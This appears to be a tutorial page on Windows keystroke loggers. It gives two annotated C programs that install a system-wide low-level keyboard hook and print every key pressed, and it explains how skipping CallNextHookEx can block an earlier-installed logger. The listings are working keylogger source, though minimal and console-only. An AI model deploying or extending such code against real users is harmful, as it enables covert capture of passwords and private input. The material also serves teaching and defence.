Keystroke Loggers

 

#define _WIN32_WINNT 0x0400

#include <windows.h>

/* File-scope state shared by the hook procedure zzz() and main(). */
MSG m;               /* message buffer filled by GetMessage in main() */
HINSTANCE h;         /* module handle handed to SetWindowsHookEx */
HHOOK k;             /* hook handle returned by SetWindowsHookEx */
char aa[100];        /* receives the key name from GetKeyNameText */
KBDLLHOOKSTRUCT o;   /* copy of the keyboard event record most recently seen by zzz() */
int i;               /* not used anywhere in this listing */
int key;             /* packed scan-code/flags value passed to GetKeyNameText */

/*
 * Low-level keyboard hook procedure for the hook installed in main().
 *
 * For every event it copies the KBDLLHOOKSTRUCT that `l` points to into the
 * global `o`, asks GetKeyNameText for the key's name, prints that name when
 * no flag bits are set, and always prints `code`.
 *
 * Return value: for code >= 0 the function returns 0 WITHOUT calling
 * CallNextHookEx, so the remaining hook procedures in the chain are not
 * called for this event. For code < 0 the event is forwarded with
 * CallNextHookEx and that result is returned.
 *
 * NOTE(review): the event record is read before `code` is checked, and the
 * parameter types are not the documented int/WPARAM/LPARAM hook-procedure
 * types; both are kept exactly as on the page.
 */
__declspec(dllexport) int __stdcall zzz(int code,unsigned int w,long l)
{
    /* Snapshot the event record into the file-scope copy. */
    o = *((KBDLLHOOKSTRUCT*)l);

    /*
     * GetKeyNameText takes a keyboard-message style lParam: scan code from
     * bit 16 upward, and bit 0 of flags (extended key) shifted to bit 24.
     */
    key = (o.scanCode << 16) + (o.flags << 24);
    GetKeyNameText(key, aa, 100);

    /* flags == 0 excludes, among others, key-release events. */
    if (o.flags == 0) {
        printf("%s", aa);
    }
    printf(" Code is %d\n", code);

    /* Normal events (code >= 0) stop here: the rest of the chain is skipped. */
    if (code >= 0) {
        return 0;
    }
    return CallNextHookEx(0, code, w, l);
}

/*
 * Installs zzz() as a WH_KEYBOARD_LL hook and then pumps messages.
 *
 * The last argument to SetWindowsHookEx (thread id) is 0, so the hook is not
 * tied to one thread: it receives keyboard events for the whole desktop. The
 * low-level hook procedure is called on the installing thread, which is why
 * this thread has to keep retrieving messages for as long as the hook should
 * stay active.
 *
 * NOTE(review): the result of SetWindowsHookEx is stored in `k` but never
 * checked, and the hook is never removed explicitly.
 */
main(int argc , char *argv[])
{
    /* Prints the numeric value of the HC_NOREMOVE constant; nothing else uses it. */
    printf("%d\n", HC_NOREMOVE);

    h = GetModuleHandle(0);   /* handle of the running executable */
    k = SetWindowsHookEx(WH_KEYBOARD_LL, zzz, h, 0); //WH_KEYBOARD_LL=13

    /* Message loop: runs until GetMessage returns 0. */
    for (;;) {
        if (!GetMessage(&m, 0, 0, 0)) {
            break;
        }
        DispatchMessage(&m);
    }
}

 

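In the earlier code, we simply called the next hook procedure. The value of code is normally 0. If we return 0 without calling CallNextHookEx, we are telling Windows not to call the next hook function in the chain. Thus we first run the original keystroke logger, then we run the above logger. Because the most recently installed hook is called first, this effectively blocks the first keystroke logger. When we quit the above logger, the first one is reactivated. This is a very simple way of disabling a keystroke logger after it has been started. Note that it only affects hooks that were installed in the same hook chain before this one; a logger that installs its hook afterwards, or that does not rely on this hook chain at all, is not blocked.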

 

The next program is the smallest keystroke logger with all the frills removed.

 

#define _WIN32_WINNT 0x0400

#include <windows.h>

/* File-scope state shared by the hook procedure zzz() and main(). */
MSG m;          /* message buffer filled by GetMessage in main() */
char aa[100];   /* receives the key name from GetKeyNameText */
int i;          /* not used anywhere in this listing */
int key;        /* packed scan-code/flags value passed to GetKeyNameText */

/*
 * Low-level keyboard hook procedure for the hook installed in main().
 *
 * Reads the KBDLLHOOKSTRUCT that `l` points to, looks up the key's name with
 * GetKeyNameText, prints it when no flag bits are set, and then always passes
 * the event on with CallNextHookEx, so other hooks in the chain still see it.
 *
 * NOTE(review): the event record is read regardless of the value of `code`,
 * and the parameter types are not the documented int/WPARAM/LPARAM
 * hook-procedure types; both are kept exactly as on the page.
 */
__declspec(dllexport) int __stdcall zzz(int code,unsigned int w,long l)
{
    const KBDLLHOOKSTRUCT *event = (const KBDLLHOOKSTRUCT *)l;

    /*
     * GetKeyNameText takes a keyboard-message style lParam: scan code from
     * bit 16 upward, and bit 0 of flags (extended key) shifted to bit 24.
     */
    key = (event->scanCode << 16) + (event->flags << 24);
    GetKeyNameText(key, aa, 100);

    /* flags == 0 excludes, among others, key-release events. */
    if (event->flags == 0) {
        printf("%s", aa);
    }

    return CallNextHookEx(0, code, w, l);
}

/*
 * Installs zzz() as a WH_KEYBOARD_LL hook and then pumps messages.
 *
 * The thread id argument is 0, so the hook receives keyboard events for the
 * whole desktop, and the message loop keeps the installing thread available
 * to run the hook procedure.
 *
 * NOTE(review): the module handle is the literal 0x400000 rather than a value
 * obtained from GetModuleHandle -- presumably the default load address of a
 * 32-bit executable; this assumes the image is really loaded there. The
 * return value of SetWindowsHookEx is discarded, so a failed installation
 * goes unnoticed and the hook cannot be removed explicitly.
 */
main(int argc , char *argv[])
{
    SetWindowsHookEx(WH_KEYBOARD_LL, zzz, 0x400000, 0);

    /* Message loop: runs until GetMessage returns 0. */
    for (;;) {
        if (!GetMessage(&m, 0, 0, 0)) {
            break;
        }
        DispatchMessage(&m);
    }
}